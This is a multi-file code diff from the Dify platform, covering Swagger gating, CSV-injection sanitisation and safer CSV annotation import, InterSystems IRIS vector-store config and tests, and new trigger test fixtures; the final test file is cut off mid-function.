web_bp,
resources={r"/*": {"origins": dify_config.WEB_API_CORS_ALLOW_ORIGINS}},
supports_credentials=True,
@ -40,7 +50,7 @@ def init_app(app: DifyApp):
)
app.register_blueprint(web_bp)
CORS(
_apply_cors_once(
console_app_bp,
resources={r"/*": {"origins": dify_config.CONSOLE_CORS_ALLOW_ORIGINS}},
supports_credentials=True,
@ -50,7 +60,7 @@ def init_app(app: DifyApp):
)
app.register_blueprint(console_app_bp)
CORS(
_apply_cors_once(
files_bp,
allow_headers=list(FILES_HEADERS),
methods=["GET", "PUT", "POST", "DELETE", "OPTIONS", "PATCH"],
@ -62,7 +72,7 @@ def init_app(app: DifyApp):
app.register_blueprint(mcp_bp)
# Register trigger blueprint with CORS for webhook calls
CORS(
_apply_cors_once(
trigger_bp,
allow_headers=["Content-Type", "Authorization", "X-App-Code"],
methods=["GET", "PUT", "POST", "DELETE", "OPTIONS", "PATCH", "HEAD"],

View File

@ -22,8 +22,8 @@ login_manager = flask_login.LoginManager()
@login_manager.request_loader
def load_user_from_request(request_from_flask_login):
"""Load user based on the request."""
# Skip authentication for documentation endpoints
if dify_config.SWAGGER_UI_ENABLED and request.path.endswith((dify_config.SWAGGER_UI_PATH, "/swagger.json")):
# Skip authentication for documentation endpoints (only when Swagger is enabled)
if dify_config.swagger_ui_enabled and request.path.endswith((dify_config.SWAGGER_UI_PATH, "/swagger.json")):
return None
auth_token = extract_access_token(request)

View File

@ -0,0 +1,7 @@
from core.db.session_factory import configure_session_factory
from extensions.ext_database import db
def init_app(app):
with app.app_context():
configure_session_factory(db.engine)

View File

@ -1,3 +1,4 @@
import logging
import mimetypes
import os
import re
@ -17,6 +18,8 @@ from core.helper import ssrf_proxy
from extensions.ext_database import db
from models import MessageFile, ToolFile, UploadFile
logger = logging.getLogger(__name__)
def build_from_message_files(
*,
@ -356,15 +359,20 @@ def _build_from_tool_file(
transfer_method: FileTransferMethod,
strict_type_validation: bool = False,
) -> File:
# Backward/interop compatibility: allow tool_file_id to come from related_id or URL
tool_file_id = mapping.get("tool_file_id")
if not tool_file_id:
raise ValueError(f"ToolFile {tool_file_id} not found")
tool_file = db.session.scalar(
select(ToolFile).where(
ToolFile.id == mapping.get("tool_file_id"),
ToolFile.id == tool_file_id,
ToolFile.tenant_id == tenant_id,
)
)
if tool_file is None:
raise ValueError(f"ToolFile {mapping.get('tool_file_id')} not found")
raise ValueError(f"ToolFile {tool_file_id} not found")
extension = "." + tool_file.file_key.split(".")[-1] if "." in tool_file.file_key else ".bin"
@ -402,10 +410,13 @@ def _build_from_datasource_file(
transfer_method: FileTransferMethod,
strict_type_validation: bool = False,
) -> File:
datasource_file_id = mapping.get("datasource_file_id")
if not datasource_file_id:
raise ValueError(f"DatasourceFile {datasource_file_id} not found")
datasource_file = (
db.session.query(UploadFile)
.where(
UploadFile.id == mapping.get("datasource_file_id"),
UploadFile.id == datasource_file_id,
UploadFile.tenant_id == tenant_id,
)
.first()

View File

@ -131,12 +131,28 @@ class ExternalApi(Api):
}
def __init__(self, app: Blueprint | Flask, *args, **kwargs):
import logging
import os
kwargs.setdefault("authorizations", self._authorizations)
kwargs.setdefault("security", "Bearer")
kwargs["add_specs"] = dify_config.SWAGGER_UI_ENABLED
kwargs["doc"] = dify_config.SWAGGER_UI_PATH if dify_config.SWAGGER_UI_ENABLED else False
# Security: Use computed swagger_ui_enabled which respects DEPLOY_ENV
swagger_enabled = dify_config.swagger_ui_enabled
kwargs["add_specs"] = swagger_enabled
kwargs["doc"] = dify_config.SWAGGER_UI_PATH if swagger_enabled else False
# manual separate call on construction and init_app to ensure configs in kwargs effective
super().__init__(app=None, *args, **kwargs)
self.init_app(app, **kwargs)
register_external_error_handlers(self)
# Security: Log warning when Swagger is enabled in production environment
deploy_env = os.environ.get("DEPLOY_ENV", "PRODUCTION")
if swagger_enabled and deploy_env.upper() == "PRODUCTION":
logger = logging.getLogger(__name__)
logger.warning(
"SECURITY WARNING: Swagger UI is ENABLED in PRODUCTION environment. "
"This may expose sensitive API documentation. "
"Set SWAGGER_UI_ENABLED=false or remove the explicit setting to disable."
)

View File

@ -215,7 +215,11 @@ def generate_text_hash(text: str) -> str:
def compact_generate_response(response: Union[Mapping, Generator, RateLimitGenerator]) -> Response:
if isinstance(response, dict):
return Response(response=json.dumps(jsonable_encoder(response)), status=200, mimetype="application/json")
return Response(
response=json.dumps(jsonable_encoder(response)),
status=200,
content_type="application/json; charset=utf-8",
)
else:
def generate() -> Generator:

View File

@ -111,7 +111,11 @@ class App(Base):
else:
app_model_config = self.app_model_config
if app_model_config:
return app_model_config.pre_prompt
pre_prompt = app_model_config.pre_prompt or ""
# Truncate to 200 characters with ellipsis if using prompt as description
if len(pre_prompt) > 200:
return pre_prompt[:200] + "..."
return pre_prompt
else:
return ""

View File

@ -1,6 +1,6 @@
[project]
name = "dify-api"
version = "1.11.0"
version = "1.11.1"
requires-python = ">=3.11,<3.13"
dependencies = [
@ -216,6 +216,7 @@ vdb = [
"pymochow==2.2.9",
"pyobvector~=0.2.17",
"qdrant-client==1.9.0",
"intersystems-irispython>=5.1.0",
"tablestore==6.3.7",
"tcvectordb~=1.6.4",
"tidb-vector==0.0.9",

View File

@ -1,5 +1,5 @@
[pytest]
addopts = --cov=./api --cov-report=json --cov-report=xml
addopts = --cov=./api --cov-report=json
env =
ANTHROPIC_API_KEY = sk-ant-api11-IamNotARealKeyJustForMockTestKawaiiiiiiiiii-NotBaka-ASkksz
AZURE_OPENAI_API_BASE = https://difyai-openai.openai.azure.com

View File

@ -1,10 +1,14 @@
import logging
import uuid
import pandas as pd
logger = logging.getLogger(__name__)
from sqlalchemy import or_, select
from werkzeug.datastructures import FileStorage
from werkzeug.exceptions import NotFound
from core.helper.csv_sanitizer import CSVSanitizer
from extensions.ext_database import db
from extensions.ext_redis import redis_client
from libs.datetime_utils import naive_utc_now
@ -155,6 +159,12 @@ class AppAnnotationService:
@classmethod
def export_annotation_list_by_app_id(cls, app_id: str):
"""
Export all annotations for an app with CSV injection protection.
Sanitizes question and content fields to prevent formula injection attacks
when exported to CSV format.
"""
# get app info
_, current_tenant_id = current_account_with_tenant()
app = (
@ -171,6 +181,16 @@ class AppAnnotationService:
.order_by(MessageAnnotation.created_at.desc())
.all()
)
# Sanitize CSV-injectable fields to prevent formula injection
for annotation in annotations:
# Sanitize question field if present
if annotation.question:
annotation.question = CSVSanitizer.sanitize_value(annotation.question)
# Sanitize content field (answer)
if annotation.content:
annotation.content = CSVSanitizer.sanitize_value(annotation.content)
return annotations
@classmethod
@ -330,6 +350,18 @@ class AppAnnotationService:
@classmethod
def batch_import_app_annotations(cls, app_id, file: FileStorage):
"""
Batch import annotations from CSV file with enhanced security checks.
Security features:
- File size validation
- Row count limits (min/max)
- Memory-efficient CSV parsing
- Subscription quota validation
- Concurrency tracking
"""
from configs import dify_config
# get app info
current_user, current_tenant_id = current_account_with_tenant()
app = (
@ -341,16 +373,80 @@ class AppAnnotationService:
if not app:
raise NotFound("App not found")
job_id: str | None = None # Initialize to avoid unbound variable error
try:
# Skip the first row
df = pd.read_csv(file.stream, dtype=str)
result = []
for _, row in df.iterrows():
content = {"question": row.iloc[0], "answer": row.iloc[1]}
# Quick row count check before full parsing (memory efficient)
# Read only first chunk to estimate row count
file.stream.seek(0)
first_chunk = file.stream.read(8192) # Read first 8KB
file.stream.seek(0)
# Estimate row count from first chunk
newline_count = first_chunk.count(b"\n")
if newline_count == 0:
raise ValueError("The CSV file appears to be empty or invalid.")
# Parse CSV with row limit to prevent memory exhaustion
# Use chunksize for memory-efficient processing
max_records = dify_config.ANNOTATION_IMPORT_MAX_RECORDS
min_records = dify_config.ANNOTATION_IMPORT_MIN_RECORDS
# Read CSV in chunks to avoid loading entire file into memory
df = pd.read_csv(
file.stream,
dtype=str,
nrows=max_records + 1, # Read one extra to detect overflow
engine="python",
on_bad_lines="skip", # Skip malformed lines instead of crashing
)
# Validate column count
if len(df.columns) < 2:
raise ValueError("Invalid CSV format. The file must contain at least 2 columns (question and answer).")
# Build result list with validation
result: list[dict] = []
for idx, row in df.iterrows():
# Stop if we exceed the limit
if len(result) >= max_records:
raise ValueError(
f"The CSV file contains too many records. Maximum {max_records} records allowed per import. "
f"Please split your file into smaller batches."
)
# Extract and validate question and answer
try:
question_raw = row.iloc[0]
answer_raw = row.iloc[1]
except (IndexError, KeyError):
continue # Skip malformed rows
# Convert to string and strip whitespace
question = str(question_raw).strip() if question_raw is not None else ""
answer = str(answer_raw).strip() if answer_raw is not None else ""
# Skip empty entries or NaN values
if not question or not answer or question.lower() == "nan" or answer.lower() == "nan":
continue
# Validate length constraints (idx is pandas index, convert to int for display)
row_num = int(idx) + 2 if isinstance(idx, (int, float)) else len(result) + 2
if len(question) > 2000:
raise ValueError(f"Question at row {row_num} is too long. Maximum 2000 characters allowed.")
if len(answer) > 10000:
raise ValueError(f"Answer at row {row_num} is too long. Maximum 10000 characters allowed.")
content = {"question": question, "answer": answer}
result.append(content)
if len(result) == 0:
raise ValueError("The CSV file is empty.")
# check annotation limit
# Validate minimum records
if len(result) < min_records:
raise ValueError(
f"The CSV file must contain at least {min_records} valid annotation record(s). "
f"Found {len(result)} valid record(s)."
)
# Check annotation quota limit
features = FeatureService.get_features(current_tenant_id)
if features.billing.enabled:
annotation_quota_limit = features.annotation_quota_limit
@ -359,12 +455,34 @@ class AppAnnotationService:
# async job
job_id = str(uuid.uuid4())
indexing_cache_key = f"app_annotation_batch_import_{str(job_id)}"
# send batch add segments task
# Register job in active tasks list for concurrency tracking
current_time = int(naive_utc_now().timestamp() * 1000)
active_jobs_key = f"annotation_import_active:{current_tenant_id}"
redis_client.zadd(active_jobs_key, {job_id: current_time})
redis_client.expire(active_jobs_key, 7200) # 2 hours TTL
# Set job status
redis_client.setnx(indexing_cache_key, "waiting")
batch_import_annotations_task.delay(str(job_id), result, app_id, current_tenant_id, current_user.id)
except Exception as e:
except ValueError as e:
return {"error_msg": str(e)}
return {"job_id": job_id, "job_status": "waiting"}
except Exception as e:
# Clean up active job registration on error (only if job was created)
if job_id is not None:
try:
active_jobs_key = f"annotation_import_active:{current_tenant_id}"
redis_client.zrem(active_jobs_key, job_id)
except Exception:
# Silently ignore cleanup errors - the job will be auto-expired
logger.debug("Failed to clean up active job tracking during error handling")
# Check if it's a CSV parsing error
error_str = str(e)
return {"error_msg": f"An error occurred while processing the file: {error_str}"}
return {"job_id": job_id, "job_status": "waiting", "record_count": len(result)}
@classmethod
def get_annotation_hit_histories(cls, app_id: str, annotation_id: str, page, limit):

View File

@ -118,7 +118,7 @@ class ConversationService:
app_model: App,
conversation_id: str,
user: Union[Account, EndUser] | None,
name: str,
name: str | None,
auto_generate: bool,
):
conversation = cls.get_conversation(app_model, conversation_id, user)

View File

@ -1419,7 +1419,7 @@ class DocumentService:
document.name = name
db.session.add(document)
if document.data_source_info_dict:
if document.data_source_info_dict and "upload_file_id" in document.data_source_info_dict:
db.session.query(UploadFile).where(
UploadFile.id == document.data_source_info_dict["upload_file_id"]
).update({UploadFile.name: name})
@ -1636,6 +1636,20 @@ class DocumentService:
return [], ""
db.session.add(dataset_process_rule)
db.session.flush()
else:
# Fallback when no process_rule provided in knowledge_config:
# 1) reuse dataset.latest_process_rule if present
# 2) otherwise create an automatic rule
dataset_process_rule = getattr(dataset, "latest_process_rule", None)
if not dataset_process_rule:
dataset_process_rule = DatasetProcessRule(
dataset_id=dataset.id,
mode="automatic",
rules=json.dumps(DatasetProcessRule.AUTOMATIC_RULES),
created_by=account.id,
)
db.session.add(dataset_process_rule)
db.session.flush()
lock_name = f"add_document_lock_dataset_id_{dataset.id}"
try:
with redis_client.lock(lock_name, timeout=600):
@ -1647,65 +1661,67 @@ class DocumentService:
if not knowledge_config.data_source.info_list.file_info_list:
raise ValueError("File source info is required")
upload_file_list = knowledge_config.data_source.info_list.file_info_list.file_ids
for file_id in upload_file_list:
file = (
db.session.query(UploadFile)
.where(UploadFile.tenant_id == dataset.tenant_id, UploadFile.id == file_id)
.first()
files = (
db.session.query(UploadFile)
.where(
UploadFile.tenant_id == dataset.tenant_id,
UploadFile.id.in_(upload_file_list),
)
.all()
)
if len(files) != len(set(upload_file_list)):
raise FileNotExistsError("One or more files not found.")
# raise error if file not found
if not file:
raise FileNotExistsError()
file_name = file.name
file_names = [file.name for file in files]
db_documents = (
db.session.query(Document)
.where(
Document.dataset_id == dataset.id,
Document.tenant_id == current_user.current_tenant_id,
Document.data_source_type == "upload_file",
Document.enabled == True,
Document.name.in_(file_names),
)
.all()
)
documents_map = {document.name: document for document in db_documents}
for file in files:
data_source_info: dict[str, str | bool] = {
"upload_file_id": file_id,
"upload_file_id": file.id,
}
# check duplicate
if knowledge_config.duplicate:
document = (
db.session.query(Document)
.filter_by(
dataset_id=dataset.id,
tenant_id=current_user.current_tenant_id,
data_source_type="upload_file",
enabled=True,
name=file_name,
)
.first()
document = documents_map.get(file.name)
if knowledge_config.duplicate and document:
document.dataset_process_rule_id = dataset_process_rule.id
document.updated_at = naive_utc_now()
document.created_from = created_from
document.doc_form = knowledge_config.doc_form
document.doc_language = knowledge_config.doc_language
document.data_source_info = json.dumps(data_source_info)
document.batch = batch
document.indexing_status = "waiting"
db.session.add(document)
documents.append(document)
duplicate_document_ids.append(document.id)
continue
else:
document = DocumentService.build_document(
dataset,
dataset_process_rule.id,
knowledge_config.data_source.info_list.data_source_type,
knowledge_config.doc_form,
knowledge_config.doc_language,
data_source_info,
created_from,
position,
account,
file.name,
batch,
)
if document:
document.dataset_process_rule_id = dataset_process_rule.id
document.updated_at = naive_utc_now()
document.created_from = created_from
document.doc_form = knowledge_config.doc_form
document.doc_language = knowledge_config.doc_language
document.data_source_info = json.dumps(data_source_info)
document.batch = batch
document.indexing_status = "waiting"
db.session.add(document)
documents.append(document)
duplicate_document_ids.append(document.id)
continue
document = DocumentService.build_document(
dataset,
dataset_process_rule.id,
knowledge_config.data_source.info_list.data_source_type,
knowledge_config.doc_form,
knowledge_config.doc_language,
data_source_info,
created_from,
position,
account,
file_name,
batch,
)
db.session.add(document)
db.session.flush()
document_ids.append(document.id)
documents.append(document)
position += 1
db.session.add(document)
db.session.flush()
document_ids.append(document.id)
documents.append(document)
position += 1
elif knowledge_config.data_source.info_list.data_source_type == "notion_import":
notion_info_list = knowledge_config.data_source.info_list.notion_info_list # type: ignore
if not notion_info_list:
@ -2801,20 +2817,20 @@ class SegmentService:
db.session.add(binding)
db.session.commit()
# save vector index
try:
VectorService.create_segments_vector(
[args["keywords"]], [segment_document], dataset, document.doc_form
)
except Exception as e:
logger.exception("create segment index failed")
segment_document.enabled = False
segment_document.disabled_at = naive_utc_now()
segment_document.status = "error"
segment_document.error = str(e)
db.session.commit()
segment = db.session.query(DocumentSegment).where(DocumentSegment.id == segment_document.id).first()
return segment
# save vector index
try:
keywords = args.get("keywords")
keywords_list = [keywords] if keywords is not None else None
VectorService.create_segments_vector(keywords_list, [segment_document], dataset, document.doc_form)
except Exception as e:
logger.exception("create segment index failed")
segment_document.enabled = False
segment_document.disabled_at = naive_utc_now()
segment_document.status = "error"
segment_document.error = str(e)
db.session.commit()
segment = db.session.query(DocumentSegment).where(DocumentSegment.id == segment_document.id).first()
return segment
except LockNotOwnedError:
pass

View File

@ -178,8 +178,8 @@ class HitTestingService:
@classmethod
def hit_testing_args_check(cls, args):
query = args["query"]
attachment_ids = args["attachment_ids"]
query = args.get("query")
attachment_ids = args.get("attachment_ids")
if not attachment_ids and not query:
raise ValueError("Query or attachment_ids is required")

View File

@ -30,6 +30,8 @@ def batch_import_annotations_task(job_id: str, content_list: list[dict], app_id:
logger.info(click.style(f"Start batch import annotation: {job_id}", fg="green"))
start_at = time.perf_counter()
indexing_cache_key = f"app_annotation_batch_import_{str(job_id)}"
active_jobs_key = f"annotation_import_active:{tenant_id}"
# get app info
app = db.session.query(App).where(App.id == app_id, App.tenant_id == tenant_id, App.status == "normal").first()
@ -91,4 +93,13 @@ def batch_import_annotations_task(job_id: str, content_list: list[dict], app_id:
redis_client.setex(indexing_error_msg_key, 600, str(e))
logger.exception("Build index for batch import annotations failed")
finally:
# Clean up active job tracking to release concurrency slot
try:
redis_client.zrem(active_jobs_key, job_id)
logger.debug("Released concurrency slot for job: %s", job_id)
except Exception as cleanup_error:
# Log but don't fail if cleanup fails - the job will be auto-expired
logger.warning("Failed to clean up active job tracking for %s: %s", job_id, cleanup_error)
# Close database session
db.session.close()

View File

@ -9,6 +9,7 @@ from core.rag.index_processor.index_processor_factory import IndexProcessorFacto
from core.tools.utils.web_reader_tool import get_image_upload_file_ids
from extensions.ext_database import db
from extensions.ext_storage import storage
from models import WorkflowType
from models.dataset import (
AppDatasetJoin,
Dataset,
@ -18,9 +19,11 @@ from models.dataset import (
DatasetQuery,
Document,
DocumentSegment,
Pipeline,
SegmentAttachmentBinding,
)
from models.model import UploadFile
from models.workflow import Workflow
logger = logging.getLogger(__name__)
@ -34,6 +37,7 @@ def clean_dataset_task(
index_struct: str,
collection_binding_id: str,
doc_form: str,
pipeline_id: str | None = None,
):
"""
Clean dataset when dataset deleted.
@ -135,6 +139,14 @@ def clean_dataset_task(
# delete dataset metadata
db.session.query(DatasetMetadata).where(DatasetMetadata.dataset_id == dataset_id).delete()
db.session.query(DatasetMetadataBinding).where(DatasetMetadataBinding.dataset_id == dataset_id).delete()
# delete pipeline and workflow
if pipeline_id:
db.session.query(Pipeline).where(Pipeline.id == pipeline_id).delete()
db.session.query(Workflow).where(
Workflow.tenant_id == tenant_id,
Workflow.app_id == pipeline_id,
Workflow.type == WorkflowType.RAG_PIPELINE,
).delete()
# delete files
if documents:
for document in documents:

View File

@ -2,6 +2,7 @@ import logging
from celery import shared_task
from configs import dify_config
from extensions.ext_database import db
from models import Account
from services.billing_service import BillingService
@ -14,7 +15,8 @@ logger = logging.getLogger(__name__)
def delete_account_task(account_id):
account = db.session.query(Account).where(Account.id == account_id).first()
try:
BillingService.delete_account(account_id)
if dify_config.BILLING_ENABLED:
BillingService.delete_account(account_id)
except Exception:
logger.exception("Failed to delete account %s from billing service.", account_id)
raise

View File

@ -55,7 +55,7 @@ WEB_API_CORS_ALLOW_ORIGINS=http://127.0.0.1:3000,*
CONSOLE_CORS_ALLOW_ORIGINS=http://127.0.0.1:3000,*
# Vector database configuration
# support: weaviate, qdrant, milvus, myscale, relyt, pgvecto_rs, pgvector, pgvector, chroma, opensearch, tidb_vector, couchbase, vikingdb, upstash, lindorm, oceanbase
# support: weaviate, qdrant, milvus, myscale, relyt, pgvecto_rs, pgvector, pgvector, chroma, opensearch, tidb_vector, couchbase, vikingdb, upstash, lindorm, oceanbase, iris
VECTOR_STORE=weaviate
# Weaviate configuration
WEAVIATE_ENDPOINT=http://localhost:8080
@ -64,6 +64,20 @@ WEAVIATE_GRPC_ENABLED=false
WEAVIATE_BATCH_SIZE=100
WEAVIATE_TOKENIZATION=word
# InterSystems IRIS configuration
IRIS_HOST=localhost
IRIS_SUPER_SERVER_PORT=1972
IRIS_WEB_SERVER_PORT=52773
IRIS_USER=_SYSTEM
IRIS_PASSWORD=Dify@1234
IRIS_DATABASE=USER
IRIS_SCHEMA=dify
IRIS_CONNECTION_URL=
IRIS_MIN_CONNECTION=1
IRIS_MAX_CONNECTION=3
IRIS_TEXT_INDEX=true
IRIS_TEXT_INDEX_LANGUAGE=en
# Upload configuration
UPLOAD_FILE_SIZE_LIMIT=15

View File

@ -1,3 +1,4 @@
import os
import pathlib
import random
import secrets
@ -32,6 +33,10 @@ def _load_env():
_load_env()
# Override storage root to tmp to avoid polluting repo during local runs
os.environ["OPENDAL_FS_ROOT"] = "/tmp/dify-storage"
os.environ.setdefault("STORAGE_TYPE", "opendal")
os.environ.setdefault("OPENDAL_SCHEME", "fs")
_CACHED_APP = create_app()

View File

@ -0,0 +1,44 @@
"""Integration tests for IRIS vector database."""
from core.rag.datasource.vdb.iris.iris_vector import IrisVector, IrisVectorConfig
from tests.integration_tests.vdb.test_vector_store import (
AbstractVectorTest,
setup_mock_redis,
)
class IrisVectorTest(AbstractVectorTest):
"""Test suite for IRIS vector store implementation."""
def __init__(self):
"""Initialize IRIS vector test with hardcoded test configuration.
Note: Uses 'host.docker.internal' to connect from DevContainer to
host OS Docker, or 'localhost' when running directly on host OS.
"""
super().__init__()
self.vector = IrisVector(
collection_name=self.collection_name,
config=IrisVectorConfig(
IRIS_HOST="host.docker.internal",
IRIS_SUPER_SERVER_PORT=1972,
IRIS_USER="_SYSTEM",
IRIS_PASSWORD="Dify@1234",
IRIS_DATABASE="USER",
IRIS_SCHEMA="dify",
IRIS_CONNECTION_URL=None,
IRIS_MIN_CONNECTION=1,
IRIS_MAX_CONNECTION=3,
IRIS_TEXT_INDEX=True,
IRIS_TEXT_INDEX_LANGUAGE="en",
),
)
def test_iris_vector(setup_mock_redis) -> None:
"""Run all IRIS vector store tests.
Args:
setup_mock_redis: Pytest fixture for mock Redis setup
"""
IrisVectorTest().run_all_tests()

View File

@ -138,9 +138,9 @@ class DifyTestContainers:
logger.warning("Failed to create plugin database: %s", e)
# Set up storage environment variables
os.environ["STORAGE_TYPE"] = "opendal"
os.environ["OPENDAL_SCHEME"] = "fs"
os.environ["OPENDAL_FS_ROOT"] = "storage"
os.environ.setdefault("STORAGE_TYPE", "opendal")
os.environ.setdefault("OPENDAL_SCHEME", "fs")
os.environ.setdefault("OPENDAL_FS_ROOT", "/tmp/dify-storage")
# Start Redis container for caching and session management
# Redis is used for storing session data, cache entries, and temporary data
@ -348,6 +348,13 @@ def _create_app_with_containers() -> Flask:
"""
logger.info("Creating Flask application with test container configuration...")
# Ensure Redis client reconnects to the containerized Redis (no auth)
from extensions import ext_redis
ext_redis.redis_client._client = None
os.environ["REDIS_USERNAME"] = ""
os.environ["REDIS_PASSWORD"] = ""
# Re-create the config after environment variables have been set
from configs import dify_config
@ -486,3 +493,29 @@ def db_session_with_containers(flask_app_with_containers) -> Generator[Session,
finally:
session.close()
logger.debug("Database session closed")
@pytest.fixture(scope="package", autouse=True)
def mock_ssrf_proxy_requests():
"""
Avoid outbound network during containerized tests by stubbing SSRF proxy helpers.
"""
from unittest.mock import patch
import httpx
def _fake_request(method, url, **kwargs):
request = httpx.Request(method=method, url=url)
return httpx.Response(200, request=request, content=b"")
with (
patch("core.helper.ssrf_proxy.make_request", side_effect=_fake_request),
patch("core.helper.ssrf_proxy.get", side_effect=lambda url, **kw: _fake_request("GET", url, **kw)),
patch("core.helper.ssrf_proxy.post", side_effect=lambda url, **kw: _fake_request("POST", url, **kw)),
patch("core.helper.ssrf_proxy.put", side_effect=lambda url, **kw: _fake_request("PUT", url, **kw)),
patch("core.helper.ssrf_proxy.patch", side_effect=lambda url, **kw: _fake_request("PATCH", url, **kw)),
patch("core.helper.ssrf_proxy.delete", side_effect=lambda url, **kw: _fake_request("DELETE", url, **kw)),
patch("core.helper.ssrf_proxy.head", side_effect=lambda url, **kw: _fake_request("HEAD", url, **kw)),
):
yield

View File

@ -240,8 +240,7 @@ class TestShardedRedisBroadcastChannelIntegration:
for future in as_completed(producer_futures, timeout=30.0):
sent_msgs.update(future.result())
subscription.close()
consumer_received_msgs = consumer_future.result(timeout=30.0)
consumer_received_msgs = consumer_future.result(timeout=60.0)
assert sent_msgs == consumer_received_msgs

View File

@ -233,7 +233,7 @@ class TestWebhookService:
"/webhook",
method="POST",
headers={"Content-Type": "multipart/form-data"},
data={"message": "test", "upload": file_storage},
data={"message": "test", "file": file_storage},
):
webhook_trigger = MagicMock()
webhook_trigger.tenant_id = "test_tenant"
@ -242,7 +242,7 @@ class TestWebhookService:
assert webhook_data["method"] == "POST"
assert webhook_data["body"]["message"] == "test"
assert "upload" in webhook_data["files"]
assert "file" in webhook_data["files"]
# Verify file processing was called
mock_external_dependencies["tool_file_manager"].assert_called_once()
@ -414,7 +414,7 @@ class TestWebhookService:
"data": {
"method": "post",
"content_type": "multipart/form-data",
"body": [{"name": "upload", "type": "file", "required": True}],
"body": [{"name": "file", "type": "file", "required": True}],
}
}

View File

@ -0,0 +1,182 @@
"""
Fixtures for trigger integration tests.
This module provides fixtures for creating test data (tenant, account, app)
and mock objects used across trigger-related tests.
"""
from __future__ import annotations
from collections.abc import Generator
from typing import Any
import pytest
from sqlalchemy.orm import Session
from models.account import Account, Tenant, TenantAccountJoin, TenantAccountRole
from models.model import App
@pytest.fixture
def tenant_and_account(db_session_with_containers: Session) -> Generator[tuple[Tenant, Account], None, None]:
"""
Create a tenant and account for testing.
This fixture creates a tenant, account, and their association,
then cleans up after the test completes.
Yields:
tuple[Tenant, Account]: The created tenant and account
"""
tenant = Tenant(name="trigger-e2e")
account = Account(name="tester", email="tester@example.com", interface_language="en-US")
db_session_with_containers.add_all([tenant, account])
db_session_with_containers.commit()
join = TenantAccountJoin(tenant_id=tenant.id, account_id=account.id, role=TenantAccountRole.OWNER.value)
db_session_with_containers.add(join)
db_session_with_containers.commit()
yield tenant, account
# Cleanup
db_session_with_containers.query(TenantAccountJoin).filter_by(tenant_id=tenant.id).delete()
db_session_with_containers.query(Account).filter_by(id=account.id).delete()
db_session_with_containers.query(Tenant).filter_by(id=tenant.id).delete()
db_session_with_containers.commit()
@pytest.fixture
def app_model(
db_session_with_containers: Session, tenant_and_account: tuple[Tenant, Account]
) -> Generator[App, None, None]:
"""
Create an app for testing.
This fixture creates a workflow app associated with the tenant and account,
then cleans up after the test completes.
Yields:
App: The created app
"""
tenant, account = tenant_and_account
app = App(
tenant_id=tenant.id,
name="trigger-app",
description="trigger e2e",
mode="workflow",
icon_type="emoji",
icon="robot",
icon_background="#FFEAD5",
enable_site=True,
enable_api=True,
api_rpm=100,
api_rph=1000,
is_demo=False,
is_public=False,
is_universal=False,
created_by=account.id,
)
db_session_with_containers.add(app)
db_session_with_containers.commit()
yield app
# Cleanup - delete related records first
from models.trigger import (
AppTrigger,
TriggerSubscription,
WorkflowPluginTrigger,
WorkflowSchedulePlan,
WorkflowTriggerLog,
WorkflowWebhookTrigger,
)
from models.workflow import Workflow
db_session_with_containers.query(WorkflowTriggerLog).filter_by(app_id=app.id).delete()
db_session_with_containers.query(WorkflowSchedulePlan).filter_by(app_id=app.id).delete()
db_session_with_containers.query(WorkflowWebhookTrigger).filter_by(app_id=app.id).delete()
db_session_with_containers.query(WorkflowPluginTrigger).filter_by(app_id=app.id).delete()
db_session_with_containers.query(AppTrigger).filter_by(app_id=app.id).delete()
db_session_with_containers.query(TriggerSubscription).filter_by(tenant_id=tenant.id).delete()
db_session_with_containers.query(Workflow).filter_by(app_id=app.id).delete()
db_session_with_containers.query(App).filter_by(id=app.id).delete()
db_session_with_containers.commit()
class MockCeleryGroup:
"""Mock for celery group() function that collects dispatched tasks."""
def __init__(self) -> None:
self.collected: list[dict[str, Any]] = []
self._applied = False
def __call__(self, items: Any) -> MockCeleryGroup:
self.collected = list(items)
return self
def apply_async(self) -> None:
self._applied = True
@property
def applied(self) -> bool:
return self._applied
class MockCelerySignature:
"""Mock for celery task signature that returns task info dict."""
def s(self, schedule_id: str) -> dict[str, str]:
return {"schedule_id": schedule_id}
@pytest.fixture
def mock_celery_group() -> MockCeleryGroup:
"""
Provide a mock celery group for testing task dispatch.
Returns:
MockCeleryGroup: Mock group that collects dispatched tasks
"""
return MockCeleryGroup()
@pytest.fixture
def mock_celery_signature() -> MockCelerySignature:
"""
Provide a mock celery signature for testing task dispatch.
Returns:
MockCelerySignature: Mock signature generator
"""
return MockCelerySignature()
class MockPluginSubscription:
"""Mock plugin subscription for testing plugin triggers."""
def __init__(
self,
subscription_id: str = "sub-1",
tenant_id: str = "tenant-1",
provider_id: str = "provider-1",
) -> None:
self.id = subscription_id
self.tenant_id = tenant_id
self.provider_id = provider_id
self.credentials: dict[str, str] = {"token": "secret"}
self.credential_type = "api-key"
def to_entity(self) -> MockPluginSubscription:
return self
@pytest.fixture
def mock_plugin_subscription() -> MockPluginSubscription:
"""
Provide a mock plugin subscription for testing.
Returns:
MockPluginSubscription: Mock subscription instance
"""
return MockPluginSubscription()

View File

@ -0,0 +1,911 @@
from __future__ import annotations
import importlib
import json
import time
from datetime import timedelta
from types import SimpleNamespace
from typing import Any
import pytest
from flask import Flask, Response
from flask.testing import FlaskClient
from sqlalchemy.orm import Session
from configs import dify_config
from core.plugin.entities.request import TriggerInvokeEventResponse
from core.trigger.debug import event_selectors
from core.trigger.debug.event_bus import TriggerDebugEventBus
from core.trigger.debug.event_selectors import PluginTriggerDebugEventPoller, WebhookTriggerDebugEventPoller
from core.trigger.debug.events import PluginTriggerDebugEvent, build_plugin_pool_key
from core.workflow.enums import NodeType
from libs.datetime_utils import naive_utc_now
from models.account import Account, Tenant
from models.enums import AppTriggerStatus, AppTriggerType, CreatorUserRole, WorkflowTriggerStatus
from models.model import App
from models.trigger import (
AppTrigger,
TriggerSubscription,
WorkflowPluginTrigger,
WorkflowSchedulePlan,
WorkflowTriggerLog,
WorkflowWebhookTrigger,
)
from models.workflow import Workflow
from schedule import workflow_schedule_task
from schedule.workflow_schedule_task import poll_workflow_schedules
from services import feature_service as feature_service_module
from services.trigger import webhook_service
from services.trigger.schedule_service import ScheduleService
from services.workflow_service import WorkflowService
from tasks import trigger_processing_tasks
from .conftest import MockCeleryGroup, MockCelerySignature, MockPluginSubscription
# Test constants
WEBHOOK_ID_PRODUCTION = "wh1234567890123456789012"
WEBHOOK_ID_DEBUG = "whdebug1234567890123456"
TEST_TRIGGER_URL = "https://trigger.example.com/base"
def _build_workflow_graph(root_node_id: str, trigger_type: NodeType) -> str:
"""Build a minimal workflow graph JSON for testing."""
node_data: dict[str, Any] = {"type": trigger_type.value, "title": "trigger"}
if trigger_type == NodeType.TRIGGER_WEBHOOK:
